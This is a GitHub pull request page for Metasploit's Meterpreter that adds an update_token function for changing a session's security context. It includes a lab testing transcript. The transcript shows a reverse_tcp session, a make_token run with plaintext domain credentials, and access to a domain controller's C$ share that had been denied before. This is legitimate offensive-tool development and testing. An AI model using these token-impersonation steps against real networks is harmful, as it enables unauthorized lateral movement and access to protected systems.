-
Notifications
You must be signed in to change notification settings - Fork 667
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add update_token function to stdapi #648
Conversation
c/meterpreter/source/extensions/stdapi/server/sys/config/config.c
Outdated
Show resolved
Hide resolved
c/meterpreter/source/extensions/stdapi/server/sys/config/config.c
Outdated
Show resolved
Hide resolved
…ND_ID_STDAPI_SYS_CONFIG* definitions
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks for the changes and this submission! I tested it out with a Server 2019 instance and a couple of different logon types. Everything seems to be working as expected. As noted by the module some logon types will cause some API calls to fail, but I don't think there's anything to do about that.
I'll go ahead and get this landed. Thanks again!
Testing Output
msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Meterpreter session 5 opened (192.168.159.128:4444 -> 192.168.159.70:61682) at 2023-06-01 17:02:10 -0400
sessions -i -1
[*] Starting interaction with 5...
meterpreter > getuid
Server username: MSFLAB\aliddle
meterpreter > sysinfo
Computer : WINDOWS-11-VM
OS : Windows 10 (10.0 Build 22621).
Architecture : x64
System Language : en_US
Domain : MSFLAB
Logged On Users : 9
Meterpreter : x64/windows
meterpreter > ls \\\\dc\\C$
[-] stdapi_fs_stat: Operation failed: Access is denied.
meterpreter > run post/windows/manage/make_token username=smcintyre password=Password2! domain=msflab.local
[*] Executing rev2self to revert any previous token impersonations
[*] Executing LogonUserA with the flag LOGON32_LOGON_NEW_CREDENTIALS to create a new security context for msflab.local\smcintyre
[*] Impersonating the new security context...
[+] The session should now run with the new security context!
[!] Remember that this will not have any effect on local actions (i.e. getuid will still show the original user)
meterpreter > getuid
Server username: MSFLAB\aliddle
meterpreter > ls \\\\dc\\C$
Listing: \\dc\C$
================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2023-02-10 09:59:20 -0500 $Recycle.Bin
040777/rwxrwxrwx 0 dir 2022-08-05 15:16:50 -0400 Documents and Settings
040777/rwxrwxrwx 0 dir 2023-05-25 13:52:45 -0400 PerfLogs
040555/r-xr-xr-x 0 dir 2023-05-31 17:00:51 -0400 Program Files
040777/rwxrwxrwx 0 dir 2023-05-31 17:00:51 -0400 Program Files (x86)
040777/rwxrwxrwx 0 dir 2022-08-05 15:26:01 -0400 ProgramData
040777/rwxrwxrwx 0 dir 2022-08-05 15:16:50 -0400 Recovery
040777/rwxrwxrwx 0 dir 2023-02-10 12:53:39 -0500 System Volume Information
040555/r-xr-xr-x 0 dir 2023-02-10 09:59:14 -0500 Users
040777/rwxrwxrwx 0 dir 2023-05-30 08:36:40 -0400 Windows
100666/rw-rw-rw- 1342177280 fil 2023-06-01 08:37:35 -0400 pagefile.sys
meterpreter >
This PR adds the
request_sys_config_update_token
function to the stdapi extension. We can use this function along with a token handle to update the security context of a Meterpreter session. This is achieved by:ImpersonateLoggedOnUser
)remote->thread_token
Point 1 should be enough to cover impersonation for any command running from the session thread (command_process_inline). Since not all commands fall into this category, point 2 ensures Meterpreter has the token handle available for other tasks creating a new thread (command_process_thread) or a new process (request_sys_process_execute).
This addition comes in combination with rapid7/metasploit-framework#18022 made in the MSF repository, which contains the ruby-side code and an example module leveraging the new update_token functionality.